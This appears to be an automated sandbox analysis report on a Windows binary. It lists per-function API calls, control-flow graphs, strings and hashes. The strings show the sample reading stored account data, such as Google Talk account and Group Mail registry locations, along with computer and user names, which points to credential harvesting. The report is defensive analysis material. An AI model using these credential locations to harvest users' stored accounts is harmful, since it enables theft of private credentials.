                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                    • API String ID: 3071782539-966475738
                                                                                                                                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 390 40ccd7-40cd06 ??2@YAPAXI@Z 391 40cd08-40cd0d 390->391 392 40cd0f 390->392 393 40cd11-40cd24 ??2@YAPAXI@Z 391->393 392->393 394 40cd26-40cd2d call 404025 393->394 395 40cd2f 393->395 396 40cd31-40cd57 394->396 395->396 399 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 396->399 400 40cd59-40cd60 DeleteObject 396->400 400->399
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                    • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                    • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                    Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 407 44b40e-44b415 GetModuleHandleA 408 44b455 407->408 409 44b417-44b426 call 44b42b 407->409 411 44b457-44b45b 408->411 418 44b48d 409->418 419 44b428-44b433 GetProcAddress 409->419 413 44b45d-44b465 GetModuleHandleA 411->413 414 44b49a call 44b49f 411->414 417 44b467-44b46f 413->417 417->417 420 44b471-44b474 417->420 422 44b48e-44b496 418->422 419->408 423 44b435-44b442 VirtualProtect 419->423 420->411 421 44b476-44b478 420->421 424 44b47e-44b486 421->424 425 44b47a-44b47c 421->425 431 44b498 422->431 427 44b454 423->427 428 44b444-44b452 VirtualProtect 423->428 429 44b487-44b488 GetProcAddress 424->429 425->429 427->408 428->427 429->418 431->420
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                    Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 455 40ba28-40ba3a 456 40ba87-40ba9b call 406c62 455->456 457 40ba3c-40ba52 call 407e20 _mbsicmp 455->457 479 40ba9d call 4107f1 456->479 480 40ba9d call 404734 456->480 481 40ba9d call 404785 456->481 482 40ba9d call 403c16 456->482 483 40ba9d call 410a9c 456->483 462 40ba54-40ba6d call 407e20 457->462 463 40ba7b-40ba85 457->463 468 40ba74 462->468 469 40ba6f-40ba72 462->469 463->456 463->457 464 40baa0-40bab3 call 407e30 472 40bab5-40bac1 464->472 473 40bafa-40bb09 SetCursor 464->473 471 40ba75-40ba76 call 40b5e5 468->471 469->471 471->463 475 40bac3-40bace 472->475 476 40bad8-40baf7 qsort 472->476 475->476 476->473 479->464 480->464 481->464 482->464 483->464
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                    Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                    Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                    Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,761F0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 889583718-2036018995
                                                                                                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                    Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                    Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D5C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D7A
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408D98
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408DA8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                    Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,761F0A60,00407A43,00000001,?,00000000,761F0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                    • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                    Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                    • API String ID: 3853255127-493054409
